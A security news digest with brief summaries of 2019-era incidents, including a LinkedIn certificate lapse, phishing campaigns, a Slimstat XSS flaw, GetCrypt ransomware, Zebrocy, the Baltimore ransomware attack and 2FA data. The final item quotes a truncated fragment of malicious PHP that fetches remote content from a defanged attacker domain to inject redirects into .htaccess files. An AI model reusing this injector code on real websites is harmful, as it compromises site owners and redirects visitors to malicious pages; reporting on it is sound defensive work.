• LinkedIn again late at renewing TLS certificate
    LinkedIn was again late at renewing its TLS certificate. The shortened URL lnkd.in was found with its TLS certificate lapsed. This is the second time LinkedIn forgot to renew the certificate on time, putting user data at risk. The shortened URL lnkd.in was found with its TLS certificate lapsed. This is the second time LinkedIn forgot to renew the certificate on time, putting user data at risk.Read More
  • New spam campaign uses fake legal threats to lure victims
    New spam campaign uses fake legal threats to lure victims. The spam emails, purporting to come from a law firm, tells victims that they are being sued. A phishing kit reported to be a part of the campaign showed that the targets were primarily Canadian businesses.Read More
  • Slimstat WordPress plugin found to be affected by XSS vulnerability
    Slimstat WordPress plugin found to be affected by XSS vulnerability. The vulnerability can allow an attacker to inject arbitrary JavaScript code on the plugin access log. Versions prior to 4.8.1 of the Slimstat plugin are affected by the XSS vulnerability.Read More
  • Free decryptor released for GetCrypt ransomware that spreads through RIG exploit kit
    Free decryptor released for GetCrypt ransomware that spreads through RIG exploit kit. GetCrypt uses a combo of Salsa20 and RSA-4096 algorithms to encrypt the victim’s files. While encrypting, it appends a random 4 character extension to the infected files.Read More
  • Denial of Service (DoS) vulnerability found in Mitsubishi PLCs
    Denial of Service (DoS) vulnerability found in Mitsubishi PLCs. The vulnerability has impacted Mitsubishi Electric MELSEC-Q series PLCs, specifically QJ71E71-100 Ethernet interface module version 20121 and prior. Mitsubishi Electric has patched the vulnerability in the latest version v20122.Read More
  • Zebrocy targets Yandex Browser, Chromium and versions of Microsoft Outlook
    Zebrocy backdoor targets Yandex Browser, Chromium and versions of Microsoft Outlook. The first set of commands collect information about the victim’s system and environment. The attackers behind Zebrocy drop dumpers on victims’ computers in order to collect login credentials and private keys from web browsers including Yandex Browser, Chromium, 7Star Browser, CentBrowser, and versions of Microsoft Outlook from 1997 through 2016.Read More
  • Two zero-days impacting Microsoft products published on GitHub
    Two zero-days impacting Microsoft products published on GitHub. SandboxEscaper uncovered a zero-day vulnerability in the Windows Error Reporting service dubbed ‘AngryPolarBearBug2’. The researcher also published a demo exploit code for a zero-day vulnerability impacting Internet Explorer 11.Read More
  • Khan Academy patched two critical cross-site request forgery flaws
    Khan Academy patched two critical cross-site request forgery flaws. The first vulnerability could allow an attacker to take over accounts that were created using the Google or Facebook login option. The second vulnerability stemmed from the flaw in the endpoint that allows users to change their email before they confirm their account email.Read More
  • America's Oldest Professional Theatre Company "The Shubert Organization" Suffers Data Breach
    “We take security of personal information in our care very seriously,” stressed a representative of the Shubert Organization, which owns 17 Broadway theaters and the popular ticketing service Telecharge. “We have security measures in place to protect the data on our systems, and we continue to assess and update our security measures and training to our employees to safeguard the privacy and security of information in our care,” the representative continued. As more and more information is stored on the Internet, cyber-security breaches are quite common for large businesses. In 2016, about 34 percent of American companies suffered a breach, and 86 percent of chief information security officers now believe that breaches are inevitable. “Data breaches are now a consistent ‘cost of doing business’ in the cybercrime era,” commented Larry Ponemon, the founder of a data security research firm. “It’s important to ensure that security measures are up to date across the entire network of companies,” stressed Guy Bunker, the senior vice president of products at Clearswift, an information security company.Read More
  • Equifax Is Finally Getting Kicked in the Money Bags Due to Its Disastrous 2017 Hack
    This week, the financial rating service Moody’s downgraded Equifax from a “stable” to a “negative” outlook due to the high level of cybersecurity spending and litigation that comes as a direct result of the 2017 breach.Read More
  • EPA Cybersecurity Weaknesses Are Going Untracked and Unpatched
    The agency created an automated tool for logging vulnerabilities that will take time to remediate and track progress through official plans of action and milestones. Another office identified 10 high-risk weaknesses but never developed action plans for remediation. “This happened because the office responsible for identifying vulnerabilities relies on other agency offices to enter the [plans of action and milestones] in the tracking system to manage unremediated vulnerabilities,” auditors wrote. The system that houses the remediation plans does not have proper access controls, enabling unauthorized users to go in and make changes to the system’s audit logs, the IG found. “This occurred because the EPA neither enabled the feature within the tracking system to prevent unauthorized modifications to key data nor configured the system’s logging feature to capture information on the modification of key data fields,” the IG wrote.Read More
  • Russian Nation-State Hacking Unit's Tools Get More Fancy
    Researchers from security firm ESET this week published new findings on the attack tool, which improves upon the older Sofacy backdoor, and combines downloaders and remote administration tools to allow attackers to control compromised systems. ESET used telemetry generated by systems using its security agent to observe the initial Zebrocy infection via spearphishing attacks and subsequent commands, the company stated in an analysis. "We were able to monitor the way they use the Zebrocy malware after they infected their target, including all the interactions they had with the infected systems, and gain some intelligence," says Alexis Dorais-Joncas, security intelligence team lead for ESET. In 2018, for example, ESET discovered that the Sednit group had successfully deployed a Unified Extensible Firmware Interface (UEFI) rootkit, dubbed LoJax, which infects the basic hardware operating system and can survive rebooting the system. Once installed, the operators would quickly perform reconnaissance on the system and gather operating system and file information, as well as other details about the system.Read More
  • Google shut out Baltimore officials using Gmail after ransomware attack
    The Baltimore city government is recovering from a devastating ransomware attack that has locked up its systems, but officials in the city faced a new problem today. As first reported by The Baltimore Sun, Google blocked city departments from using Gmail accounts created as a workaround. According to the Sun, which cited the mayor’s office, Google’s systems deemed the city officials to be part of an organization, and shut down the temporary accounts. Emails to the city health department, city council aides, and the mayor’s office bounced on Thursday, according to the report from the Sun. “We have restored access to the Gmail accounts for the Baltimore city officials,” the spokesperson said. “Our automated security systems disabled the accounts due to the bulk creation of multiple consumer Gmail accounts from the same network.” Update, 5:43 PM ET: Includes statement from Google spokesperson.Read More
  • LinkedIn Admits a Delay in Renewing TLS Cert
    LinkedIn users noticed on Tuesday that attempts to access the site from their desktop or laptop computer were met with an alert warning that the connection was not secure – the result of LinkedIn’s failure to renew the TLS certificate for its lnkd.in URL shortener, according to Computer Business Review (CBR). “We had a brief delay in our SSL certificate update yesterday, which was quickly fixed, and member data was not affected,” a LinkedIn spokesperson wrote in an email. If you are wondering why your browser is throwing a Certificate Error when navigating around @LinkedIn posts their cert expired a few hours ago on the URL shortener lnkd[.]in. Leonard and others noted that this is the second time that LinkedIn has allowed a certificate to expire. “Large organizations with hundreds of millions of users globally should be setting the standard for security practices and unfortunately this is the second time that LinkedIn failed to update their SSL certificate, effectively putting user data and privacy at risk,” Leondard reportedly told CBR.Read More
  • Email scam warning for Ministry for Primary Industries customers
    The phishing email was sent to some customers and impersonated MPI. The subject line read "Re: Notices to All MPI Registerd (sic) Exporters" and asked customers to check an email attachment for corrections. MPI recommended those who had already clicked on the email or opened the attachment to change passwords for any login credentials entered. Email phishing guide: -Only open email attachments you are expecting or know the sender -Do not contact them on the phone numbers, websites or email addresses included in the emailRead More
  • Google data shows 2-factor authentication blocks 100% of automated bot hacks
    Getting flustered because you have to find your phone and tap on a prompt every time you log into your accounts from a new device is peak first-world problems. If you’re not familiar with two-factor authentication (2FA) or two-step verification, it’s all about using an extra layer of security to prove the person logging into an account or device is really you. Google supports these forms of 2FA and others;  if you have it enabled on your Android device, you’ve probably come across the “Trying to sign in?” prompt. Receiving a secondary SMS code blocked 100 percent of automated attacks, 96 percent of bulk phishing attacks, and 76 percent of direct, targeted attacks – like those made by hired hackers. Of course, using a physical security key is safest, blocking 100 percent of each kind of attack during Google’s investigation. For most people, simply adding a recovery phone number to your Google account can make it much easier to keep your account safe when Google detects suspicious activity.Read More
  • USAF investigating USN for planting email tracking malware
    In a convoluted plot even the most inventive TV writer would have a hard time conjuring the U.S. Air Force is investigating an alleged cyber intrusion by the U.S. Navy. A U.S. Air Force lawyer and Navy Times journalist each received emails containing tracking malware that was allegedly sent by a U.S. Navy prosecutor in an attempt to track down who was leaking information to the press regarding the trial of a Navy SEAL, according to the Air Force Times. The Air Force Times cited a May 19 memo by Capt. David Wilson, chief of staff for the Navy’s Defense Service Offices that said he discovered that tracking software was included in an email sent to an Air Force lawyer defending Navy SEAL Edward Gallagher, who, among others, has been charged with war crimes stemming from incidents in Iraq. The tracking malware was placed after a Navy judge issued a gag order for Gallagher’s case, but information continued to leak to the Navy Times, which is why Carl Pines, the publications editor, was also on the receiving end of the malware-laced emails, the Air Force Times reported.Read More
  • .htaccess Injector on Joomla and WordPress Websites
    This code is responsible for injecting the malicious redirects into the .htaccess files: <?php echo'Wordpress ';$htac=file_get_contents('hXXp://recaptcha-in[.Read More